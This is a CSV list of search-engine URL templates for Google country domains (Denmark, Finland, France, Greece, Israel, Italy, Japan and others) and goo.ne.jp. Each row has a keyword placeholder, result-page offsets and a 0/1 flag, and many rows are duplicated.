"International","Google DE 5 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google DE 5 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=400&sa=N","0"
"International","Google DE 5 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=400&sa=N","0"
"International","Google DE 5 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google DK","http://www.google.com/search?num=100&q={SEARCH_KEYWORD}&hl=da&lr=lang_da","1"
"International","Google DK","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google DK","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google DK","http://www.google.com/search?num=100&q={SEARCH_KEYWORD}&hl=da&lr=lang_da","0"
"International","Google DK","http://www.google.com/search?num=100&q={SEARCH_KEYWORD}&hl=da&lr=lang_da","0"
"International","Google DK","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google DK 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=100&sa=N","1"
"International","Google DK 2 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google DK 2 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google DK 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=100&sa=N","0"
"International","Google DK 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=100&sa=N","0"
"International","Google DK 2 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google DK 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=200&sa=N","1"
"International","Google DK 3 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google DK 3 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google DK 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=200&sa=N","0"
"International","Google DK 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=200&sa=N","0"
"International","Google DK 3 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google DK 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=300&sa=N","1"
"International","Google DK 4 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google DK 4 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google DK 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=300&sa=N","0"
"International","Google DK 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=300&sa=N","0"
"International","Google DK 4 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google DK 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=400&sa=N","1"
"International","Google DK 5 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google DK 5 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google DK 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=400&sa=N","0"
"International","Google DK 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=da&lr=lang_da&ie=UTF-8&start=400&sa=N","0"
"International","Google DK 5 (Next 100)","http://www.google.dk/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google FI","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","1"
"International","Google FI","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google FI","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google FI","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google FI","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google FI","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google FI 2 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google FI 2 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google FI 2 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google FI 2 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google FI 2 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google FI 2 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google FI 3 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google FI 3 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google FI 3 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google FI 3 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google FI 3 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google FI 3 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google FI 4 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google FI 4 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google FI 4 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google FI 4 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google FI 4 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google FI 4 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google FI 5 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google FI 5 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google FI 5 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google FI 5 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google FI 5 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=sv&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google FI 5 (Next 100)","http://www.google.fi/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google FR","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=0&sa=N","1"
"International","Google FR","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google FR","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google FR","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=0&sa=N","0"
"International","Google FR","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=0&sa=N","0"
"International","Google FR","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google FR 2 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=100&sa=N","1"
"International","Google FR 2 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google FR 2 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google FR 2 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=100&sa=N","0"
"International","Google FR 2 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=100&sa=N","0"
"International","Google FR 2 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google FR 3 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=200&sa=N","1"
"International","Google FR 3 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google FR 3 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google FR 3 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=200&sa=N","0"
"International","Google FR 3 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=200&sa=N","0"
"International","Google FR 3 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google FR 4 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=300&sa=N","1"
"International","Google FR 4 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google FR 4 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google FR 4 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=300&sa=N","0"
"International","Google FR 4 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=300&sa=N","0"
"International","Google FR 4 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google FR 5 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=400&sa=N","1"
"International","Google FR 5 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google FR 5 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google FR 5 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=400&sa=N","0"
"International","Google FR 5 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=fr&lr=lang_fr&ie=UTF-8&start=400&sa=N","0"
"International","Google FR 5 (Next 100)","http://www.google.fr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google GR","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","1"
"International","Google GR","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google GR","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google GR","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google GR","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google GR","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google GR 2 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google GR 2 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","1"
"International","Google GR 2 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google GR 2 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google GR 2 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google GR 2 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google GR 3 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google GR 3 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google GR 3 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google GR 3 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google GR 3 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google GR 3 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google GR 4 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
"International","Google GR 4 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google GR 4 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google GR 4 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google GR 4 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google GR 4 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google GR 5 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","1"
"International","Google GR 5 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google GR 5 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google GR 5 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google GR 5 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=el&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google GR 5 (Next 100)","http://www.google.com.gr/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google IL","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=0&sa=N","1"
"International","Google IL","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=0&sa=N","0"
"International","Google IL","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=0&sa=N","0"
"International","Google IL 2 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=100&sa=N","1"
"International","Google IL 2 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=100&sa=N","0"
"International","Google IL 2 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=100&sa=N","0"
"International","Google IL 3 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","1"
"International","Google IL 3 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","0"
"International","Google IL 3 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","0"
"International","Google IL 4 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","1"
"International","Google IL 4 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","0"
"International","Google IL 4 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","0"
"International","Google IL 5 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","1"
"International","Google IL 5 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","0"
"International","Google IL 5 (Next 100)","http://www.google.co.il/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&inlang=iw&start=200&sa=N","0"
"International","Google IT","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=0&sa=N","1"
"International","Google IT","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google IT","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google IT","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=0&sa=N","0"
"International","Google IT","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=0&sa=N","0"
"International","Google IT","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google IT 2 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=100&sa=N","1"
"International","Google IT 2 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google IT 2 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google IT 2 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=100&sa=N","0"
"International","Google IT 2 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=100&sa=N","0"
"International","Google IT 2 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google IT 3 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=200&sa=N","1"
"International","Google IT 3 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google IT 3 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google IT 3 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=200&sa=N","0"
"International","Google IT 3 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=200&sa=N","0"
"International","Google IT 3 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google IT 4 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=300&sa=N","1"
"International","Google IT 4 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google IT 4 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google IT 4 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=300&sa=N","0"
"International","Google IT 4 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=300&sa=N","0"
"International","Google IT 4 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google IT 5 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=400&sa=N","1"
"International","Google IT 5 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google IT 5 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google IT 5 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=400&sa=N","0"
"International","Google IT 5 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=it&lr=lang_it&ie=UTF-8&start=400&sa=N","0"
"International","Google IT 5 (Next 100)","http://www.google.it/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google JP","http://search.goo.ne.jp/web.jsp?TAB=&MT={SEARCH_KEYWORD}","0"
"International","Google JP","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google JP","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google JP","http://search.goo.ne.jp/web.jsp?TAB=&MT={SEARCH_KEYWORD}","0"
"International","Google JP","http://search.goo.ne.jp/web.jsp?TAB=&MT={SEARCH_KEYWORD}","0"
"International","Google JP","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google JP 2 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=10&WTS=ntt&CK=1","0"
"International","Google JP 2 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=10&WTS=ntt&CK=1","0"
"International","Google JP 2 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=10&WTS=ntt&CK=1","0"
"International","Google JP 2 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google JP 2 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google JP 2 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google JP 3 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=20&WTS=ntt&CK=1","0"
"International","Google JP 3 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=20&WTS=ntt&CK=1","0"
"International","Google JP 3 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=20&WTS=ntt&CK=1","0"
"International","Google JP 3 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google JP 3 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google JP 3 (Next 100)","http://www.google.co.jp/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google JP 4 (Next 10)","http://search.goo.ne.jp/web.jsp?MT={SEARCH_KEYWORD}&SM=MC&DC=10&DE=2&FR=30&WTS=ntt&CK=1","0"
